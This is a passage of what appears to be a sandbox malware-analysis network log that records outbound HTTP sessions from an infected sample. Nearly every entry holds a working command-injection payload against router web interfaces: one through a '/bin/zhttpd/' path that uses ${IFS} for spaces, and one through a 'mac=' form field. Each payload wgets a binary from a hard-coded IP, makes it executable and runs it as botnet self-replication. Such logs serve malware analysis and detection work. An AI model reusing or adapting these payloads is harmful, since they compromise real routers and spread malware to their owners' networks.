                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.245.236.146/skyljnee.mpsl; chmod 777 skyljnee.mpsl; ./skyljnee.mpsl lblink.selfrep;rm *mpsl*;
                                                        Jan 28, 2024 10:12:44.505026102 CET517INHTTP/1.1 400 Bad Request
                                                        Server: Byte-nginx
                                                        Date: Sun, 28 Jan 2024 09:12:44 GMT
                                                        Content-Type: text/html
                                                        Content-Length: 230
                                                        Connection: close
                                                        via: cache11.tacn
                                                        x-request-ip: 81.181.57.74
                                                        x-tt-trace-tag: id=5
                                                        x-response-cinfo: 81.181.57.74
                                                        x-response-cache: miss
                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 2f 3e 50 6f 77 65 72 65 64 20 62 79 20 42 79 74 65 2d 6e 67 69 6e 78 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 74 65 6e 67 69 6e 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr/>Powered by Byte-nginx<hr><center>tengine</center></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2169192.168.2.1450030146.96.124.226443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:44.237251043 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2170192.168.2.145186849.190.28.99443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:44.237283945 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2171192.168.2.1434496140.35.107.101443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:44.237312078 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2172192.168.2.144756266.20.102.27443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:44.237340927 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2173192.168.2.1455518180.36.245.174443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:44.237396002 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2174192.168.2.1439420202.21.45.8443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:44.237425089 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2175192.168.2.145875840.210.71.31443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:44.237481117 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2176192.168.2.1440806125.60.182.120443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:44.237539053 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2177192.168.2.1449204201.75.53.156443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:44.237569094 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2178192.168.2.1433486101.211.253.165443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:44.237607002 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2179192.168.2.1459306109.171.65.141443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:44.237634897 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2180192.168.2.1433820125.224.233.214443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:44.237673998 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2181192.168.2.1455318115.174.199.32443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:44.237709999 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2182192.168.2.1459898180.173.120.48443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:44.237775087 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2183192.168.2.1440710175.35.229.220443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:44.237838030 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2184192.168.2.1455516213.152.120.27443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:44.237867117 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2185192.168.2.1446372155.61.53.220443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:44.237921953 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2186192.168.2.1435894157.89.248.165443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:44.237948895 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2187192.168.2.143542850.77.176.220443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:44.237971067 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2188192.168.2.1458336188.6.188.181443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:44.238023996 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2189192.168.2.1444250220.211.138.255443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:44.238059998 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2190192.168.2.143640434.24.36.137443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:44.238111019 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2191192.168.2.144697862.196.150.61443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:44.238138914 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2192192.168.2.144487085.223.5.100443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:44.238193989 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2193192.168.2.1441986109.152.220.46443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:44.238243103 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2194192.168.2.1433706119.219.140.120443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:44.238398075 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2195192.168.2.1451510172.100.225.90443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:44.238440037 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2196192.168.2.144954412.109.73.231443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:44.238473892 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2197192.168.2.1446936173.96.57.84443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:44.238513947 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2198192.168.2.145379870.53.205.177443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:44.238544941 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2199192.168.2.144693238.148.222.97443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:44.238570929 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2200192.168.2.1441704152.145.76.133443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:44.238610029 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2201192.168.2.143710863.151.56.0443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:44.238662004 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2202192.168.2.1440208171.135.231.73443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:44.238701105 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2203192.168.2.145947085.153.25.245443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:44.238771915 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2204192.168.2.144258432.237.17.40443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:44.238781929 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2205192.168.2.1443758135.231.107.202443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:44.238831043 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2206192.168.2.145561649.70.199.215443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:44.238853931 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2207192.168.2.1449084173.123.101.163443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:44.238888025 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2208192.168.2.145311625.138.254.26443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:44.238920927 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2209192.168.2.1455494195.223.33.245443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:44.238959074 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2210192.168.2.143420245.252.229.253443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:44.238991022 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2211192.168.2.1434248142.163.187.203443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:44.239022017 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2212192.168.2.1436408189.214.119.4443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:44.239063025 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2213192.168.2.1438268109.254.6.25443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:44.239108086 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2214192.168.2.1433888189.126.50.161443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:44.239146948 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2215192.168.2.145203087.161.193.189443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:44.239187002 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2216192.168.2.1448086118.19.183.143443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:44.239221096 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2217192.168.2.1450888156.158.203.35443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:44.239259005 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2218192.168.2.1434442194.4.81.236443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:44.239309072 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2219192.168.2.1435606218.134.115.179443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:44.239342928 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2220192.168.2.1436318141.209.34.15443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:44.239379883 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2221192.168.2.1448194146.185.25.50443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:44.239429951 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2222192.168.2.1452584221.216.130.82443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:44.239459038 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2223192.168.2.1453454180.216.109.34443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:44.239504099 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2224192.168.2.1447082182.165.48.166443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:44.239548922 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2225192.168.2.1447206197.96.81.79443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:44.239590883 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2226192.168.2.143342853.3.191.106443
                                                        TimestampBytes transferredDirectionData
